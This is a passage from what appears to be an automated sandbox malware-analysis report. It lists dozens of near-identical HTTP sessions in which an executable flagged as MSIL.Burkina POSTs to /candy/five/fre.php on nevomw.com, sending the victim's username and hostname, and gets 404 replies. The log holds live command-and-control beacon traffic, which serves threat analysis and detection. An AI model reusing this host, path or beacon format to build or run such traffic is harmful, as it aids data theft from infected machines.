                                            186 | 192.168.2.6 | 49934 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:54:07.745647907 CET | 1588 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:07.797575951 CET | 1588 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:07.870342016 CET | 1588 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:07 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            187 | 192.168.2.6 | 49935 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:54:08.120275021 CET | 1589 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:08.175287008 CET | 1589 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:08.249250889 CET | 1590 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:08 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            188 | 192.168.2.6 | 49936 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:54:08.508028030 CET | 1591 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:08.564369917 CET | 1591 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:08.637877941 CET | 1591 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:08 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            189 | 192.168.2.6 | 49937 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:54:09.113024950 CET | 1592 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:09.166830063 CET | 1592 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:09.240145922 CET | 1593 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:09 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            19 | 192.168.2.6 | 49732 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:52:51.071178913 CET | 98 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:52:51.123859882 CET | 98 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:52:51.201095104 CET | 98 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:51 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            190 | 192.168.2.6 | 49938 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:54:11.242526054 CET | 1594 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:11.302968979 CET | 1594 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:11.376329899 CET | 1594 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:11 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            191 | 192.168.2.6 | 49939 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:54:11.639262915 CET | 1595 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:11.692301989 CET | 1595 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:11.771996021 CET | 1596 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:11 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            192 | 192.168.2.6 | 49940 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:54:12.071896076 CET | 1596 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:12.125400066 CET | 1597 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:12.200444937 CET | 1597 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:12 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            193 | 192.168.2.6 | 49941 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:54:12.634165049 CET | 1598 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:12.686851978 CET | 1598 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:12.768111944 CET | 1599 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:12 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            194 | 192.168.2.6 | 49942 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:54:13.017353058 CET | 1599 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:13.069201946 CET | 1600 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:13.140944958 CET | 1600 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:13 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            195 | 192.168.2.6 | 49943 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:54:13.460319996 CET | 1601 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:13.514307022 CET | 1601 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:13.589608908 CET | 1601 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:13 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            196 | 192.168.2.6 | 49944 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:54:13.903883934 CET | 1603 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:13.956406116 CET | 1603 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:14.030296087 CET | 1603 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:14 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            197 | 192.168.2.6 | 49945 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:54:14.273895979 CET | 1604 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:14.326558113 CET | 1604 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:14.412825108 CET | 1605 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:14 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            198 | 192.168.2.6 | 49946 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:54:14.721467972 CET | 1605 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:14.773554087 CET | 1606 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:14.852649927 CET | 1606 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:14 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            199 | 192.168.2.6 | 49947 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:54:15.132386923 CET | 1607 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:15.187186003 CET | 1607 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:15.261504889 CET | 1608 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:15 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            2 | 192.168.2.6 | 49714 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:52:42.190738916 CET | 60 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:52:42.243526936 CET | 60 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:52:42.317408085 CET | 60 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:42 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            20 | 192.168.2.6 | 49733 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:52:51.489197016 CET | 99 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:52:51.541227102 CET | 99 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:52:51.665469885 CET | 100 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:52:51 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            200 | 192.168.2.6 | 49948 | 45.144.3.234 | 80 | C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Dec 2, 2020 11:54:15.547116041 CET | 1609 | OUT | POST /candy/five/fre.php HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: nevomw.com
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: F1D39DE6
                                            Content-Length: 169
                                            Connection: close
                                            Dec 2, 2020 11:54:15.599518061 CET | 1609 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                                            Data Ascii: (ckav.ruengineer367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                            Dec 2, 2020 11:54:15.675228119 CET | 1610 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx
                                            Date: Wed, 02 Dec 2020 10:54:15 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 23
                                            Connection: close
                                            X-Powered-By: PHP/7.4.10RC1
                                            Status: 404 Not Found
                                            Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                            Data Ascii: File not found.


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
